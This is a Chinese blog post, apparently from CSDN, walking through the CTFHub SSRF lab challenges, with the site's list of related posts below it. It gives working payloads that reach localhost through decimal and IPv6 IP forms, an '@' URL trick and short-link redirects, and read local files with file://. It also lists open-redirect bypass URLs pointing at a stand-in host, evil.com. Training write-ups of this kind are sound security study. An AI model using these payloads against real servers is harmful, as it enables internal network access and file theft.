【ctfhub】SSRF

最新推荐文章于 2024-05-21 22:07:05 发布
最新推荐文章于 2024-05-21 22:07:05 发布
阅读量832 收藏 4
点赞数 2
分类专栏: html+css 刷题记录 文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/123035738
版权

目录

SSRF

知识点:回环地址

内网访问

伪协议读取文件

 数字IP Bypass

 DNS 重绑定

URL Bypass

302跳转 Bypass

SSRF

在过滤了一堆中找ip本身

我们不能直接访问pc或moblie,必须通过server操作

直接改包很难,除非有说明是从本地来,否则严格的服务器不能通过改包实现

都是让服务器能够访问本地或者内网环境

知识点:回环地址

127.0.0.1

  • 这是一个最常见的回环地址。
  • 回环地址是什么呢?

 回环地址并非只有一个,所有127开头的都是回环地址。127.0.0.1~127.255.255.255


回环地址有什么用?


 计算机以回环地址发送的消息,并不会由链路层送走,而是被本机网络层捕获。用处只有一个,就是自己发给自己,自娱自乐



0.0.0.0


这个地址用于指代本机的所有ip地址,当然也包括回环地址。如果本机有多个网卡,那么0.0.0.0就代表所有网卡的ip加上所有的回环地址。


异同
如果前面看明白了,他们的异同也很明显了。

0.0.0.0包含127.0.0.1,都代表本机。(仅从本机视角去看)
0.0.0.0和127.0.0.1对其他主机都不可见
0.0.0.0代表一个ip集合,无法访问;127是单个ip可以访问



如果在网关路由表中设置0.0.0.0,他代表网关的所有ip,因此他会收容所有未知的请求。  

   

原文链接:https://blog.csdn.net/qq_41655115/article/details/107165698

内网访问

尝试访问位于127.0.0.1的flag.php吧

?url=http://127.0.0.1/flag.php

也可用ipv6 ,{::ffff:7f00:1} 代替127.0.0.1

伪协议读取文件

尝试去读取一下Web目录下的flag.php吧  

使用这个读不出来,php://filter/read=convert.base64-encode/resource=flag.php

查了一下,这个是文件包含中的,不能用于ssrf

 SSRF中的URL的伪协议:

  • file:///
  • dict:///
  • sftp://
  • ldap://
  • tftp://
  • gopher://

我们读取web目录下的文件,一般网站的目录都放在www/html/目录下,结合之前做题经验,直接构造url

?url=file:///var/www/html/flag.php

 数字IP Bypass

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

将127.0.0.1转换进制(每八位)

 十进制 2130706433

八进制 017700000001

二进制 1111111000000000000000000000001

?url=http://2130706433/flag.php

 DNS 重绑定

详解DNS重绑定攻击

URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧

下图的实例中,我们看到上述所述编程语言的解析函数得到的IP是google.com,而cURL请求得到的却是evil.com:80

  

单斜线"/"绕过
https://www.landgrey.me/redirect.php?url=/www.evil.com
缺少协议绕过
https://www.landgrey.me/redirect.php?url=//www.evil.com
多斜线"/"前缀绕过
https://www.landgrey.me/redirect.php?url=///www.evil.com
https://www.landgrey.me/redirect.php?url=www.evil.com
利用"@"符号绕过
https://www.landgrey.me/redirect.php?url=https://www.landgrey.me@www.evil.com
利用反斜线""绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me
利用"#"符号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com#www.landgrey.me
利用"?"号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me
利用"\"绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me
利用"."绕过
https://www.landgrey.me/redirect.php?url=.evil (可能会跳转到www.landgrey.me.evil域名)
https://www.landgrey.me/redirect.php?url=.evil.com (可能会跳转到evil.com域名)
10.重复特殊字符绕过
https://www.landgrey.me/redirect.php?url=///www.evil.com//…
https://www.landgrey.me/redirect.php?url=www.evil.com//…

这里我们用@绕过

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

302跳转 Bypass

先访问?url=http://127.0.0.1/flag.php

这里是 短链接变换

短链接变换推荐链接:https://www.985.so/

短链接变换通过检索短网址上的数据库链接,再跳转原(长)链接访问。
实际上这就是一种302

1.用localhost代替127.0.0.1

这个可以

2.利用短域名

http://surl-2.cn/0nPI

http://dwz-1.ink/0ndbh

这两个都是直接访问本地127.0.0.1/flag.php

pipasound
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF(10)302跳转 Bypass
m0_64417923的博客
05-22 2380
题目描述:SSRF中有个很要的一点是请求可能会跟随302跳转。尝试利用这个来绕过对IP的检测,访问到位于127.0.0.1的flag.php吧。 相关知识 什么是HTTP 302 跳转? 首先我们要知道状态码,状态码是HTTP请求过程结果的描述,由三位数字组成。这三位数字描述了请求过程中所发生的情况。状态码位于响应的起始行中,如在 HTTP/1.0 200 OK 中,状态码就是 200。 每个状态码的第一位数字都用于描述状态(“成功”、“出错”等)。如200 到 299 之间的状态码表示成功;3
flag.php
萍水间人的小天地
01-29 1832
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
WEB>SSRF(URL Bypass,数字IP Bypass,302跳转Bypass,DNS绑定Bypass)
Ynh323的博客
05-08 1521
目录 一、URF Bypass 二、 数字IP Bypass 三、302跳转 Bypass 四、DNS绑定Bypass 一、URF Bypass 题目: 解题思路: 1.根据上图提示构造 url=http://notfound.ctfhub.com@127.0.0.1/flag.php 2.访问得到flag 二、 数字IP Bypass 题目: 解题思路: 1.刚开始尝试访问url=127.0.0.1/flag.php 2. 根据上.
CTFHUB技能树——SSRF(一)
最新发布
2401_82985722的博客
05-21 1263
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)
L2329794714的博客
11-20 3028
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
flag就在flag.php
热门推荐
Peithon的博客
05-13 9万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密...
渗透测试DNS绑定
wangluoanquan111的博客
07-31 580
*
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
引入flag.php文件,flag在php中咋解决
weixin_33982355的博客
03-10 2515
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
渗透测试-DNS绑定
cdyunaq的博客
05-10 3167
- 前言 - SSRF绕过的一种思路,就是利用DNS绑定,它也被广泛用于绕过同源策略,本质就是欺骗客户端请求的IP地址。 但是之前都是用如xip.io等别人搭建好的平台去利用,没有自己搞过,也没能彻底理解其中的原理 - DNS绑定 - 浏览网页过程中,用户在地址栏中输入包含域名的网址,浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。即域名 => 公共DNS服务器 => IP 但是作为域名的所有者,可以随时设置解析IP,举例如下: 用户第.
浅析SSRF的各种利用方式
m0_64583632的博客
11-10 720
浅析SSRF的各种利用方式和绕过
DAY37:SSRF 漏洞
qq_49433473的博客
08-22 1334
SSRF(Sever Side Request Forgery)—服务器端请求伪造、产生 SSRF 漏洞的函数、SSRF 漏洞可能存在的场景、SSRF 漏洞绕过方式、SSRF 漏洞的危害、SSRF 漏洞防御、小练习
CTF整理】WriteUp Bugku flag.php
SunnyCat
10-30 886
WriteUp Bugku flag.php 题目:http://123.206.87.240:8002/flagphp 点击:flag.php 随便输入点击没有反应,右键查看源码,没什么有价值的发现 想到提示hint,将之作为url参数提交试试,出现php代码。 顺序:1、2、3、4、5、 <?php error_reporting(0); include_once("flag.php"); // 1、flag的位置 $cookie = $_COOKIE['ISecer']; //
CTF尝试去读取一下Web目录下的flag.php
diven2的博客
05-28 2269
CTF尝试去读取一下Web目录下的flag.php
CTFhub--SSRF
qq_46874275的博客
05-17 709
~目录~开始内网访问伪协议读取文件端口扫描POST请求 开始 内网访问 提示:尝试访问位于127.0.0.1的flag.php吧 直接url=127.0.0.1/flag.php 伪协议读取文件 提示:尝试去读取一下Web目录下的flag.php吧 URL的伪协议有以下几种: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 读取web目录下的flag.php利用file:/// url=file:///var/www/html/flag.php
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值